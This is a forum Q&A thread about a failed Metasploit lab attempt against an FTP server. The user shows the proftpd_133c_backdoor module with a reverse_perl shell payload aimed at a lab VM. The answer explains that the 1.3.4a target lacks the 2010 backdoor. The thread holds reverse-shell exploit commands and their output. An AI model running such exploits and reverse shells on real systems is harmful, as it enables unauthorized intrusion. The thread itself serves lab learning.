0

I wanted to practice exploiting system using proftpd backdoor. I use the exploit proftpd_133c_backdoor and the payload reverse_perl.I learned on how to exploit using this link, https://www.youtube.com/watch?v=1Rp5_QysRpE&t=2s.

My attacker virtual machine is 192.168.19.2. My victim virtual machine is 192.168.19.5(proftpd 1.3.4a.) The port opened on the victim is 21 and the version name is proFTPD 1.3.4a

Here is the configuration of the exploit and the payload below.

msf exploit(unix/ftp/proftpd_133c_backdoor) > show options

Module options (exploit/unix/ftp/proftpd_133c_backdoor):

Name   Current Setting  Required  Description
----   ---------------  --------  -----------
RHOST  192.168.19.5   yes       The target address
RPORT  21               yes       The target port (TCP)


Payload options (cmd/unix/reverse_perl):

 Name   Current Setting  Required  Description
 ----   ---------------  --------  -----------
 LHOST  192.168.19.2   yes       The listen address
 LPORT  4444             yes       The listen port


 Exploit target:

 Id  Name
 --  ----
 0   Automatic

then I exploited it however it states not backdoor. the result is shown below.

msf exploit(unix/ftp/proftpd_133c_backdoor) > exploit

[*] Started reverse TCP double handler on 192.168.19.2:4444 
[*] 192.168.19.5:21 - Sending Backdoor Command
[-] 192.168.19.5:21 - Not backdoored
[*] Exploit completed, but no session was created.

What are the solutions to achieve this exploit? and how to do it?Please help me. thank you.

Abdullah Naina
  • 1
  • 1
  • 4

1 Answers1

2

I use the exploit proftpd_133c_backdoor ...

From the documentation you can see that:

This module exploits a malicious backdoor that was added to the ProFTPD download archive. This backdoor was present in the proftpd-1.3.3c.tar.[bz2|gz] archive between November 28th 2010 and 2nd December 2010

But you are obviously using a version of proftpd which is not affected by this backdoor:

My victim virtual machine ... proftpd 1.3.4a

No wonder that it does not work. In fact, it is the expected behavior that it does not work.

Steffen Ullrich
  • 184,332
  • 29
  • 363
  • 424
  • are you saying that I need to use exploit proftpd_134a_backdoor – Abdullah Naina Apr 30 '18 at 07:01
  • 1
    @AbdullahNaina: I am saying that you cannot exploit a bug which is not there. This means that you should not just pick some exploit and try it but that you need to study first the requirements of this exploit and only use exploits where you have the requirements or adjust your test setup so that you have the requirements. Also, your comment suggests to me that you are assuming that there is an ready exploit for every software in all setups and that you just have to use the right exploit. This is not the case. – Steffen Ullrich Apr 30 '18 at 07:10
  • I understand but I cant find the exact version in the exploit when I search for proftpd. it gave me proftpd_133c backdoor and proftpd 1.3.5 mod copy execution – Abdullah Naina Apr 30 '18 at 07:26
  • 1
    @AbdullahNaina: to cite from my last comment (maybe you should read it in full): *"... you are assuming that there is an ready exploit for every software in all setups and that you just have to use the right exploit. __This is not the case__."* – Steffen Ullrich Apr 30 '18 at 07:28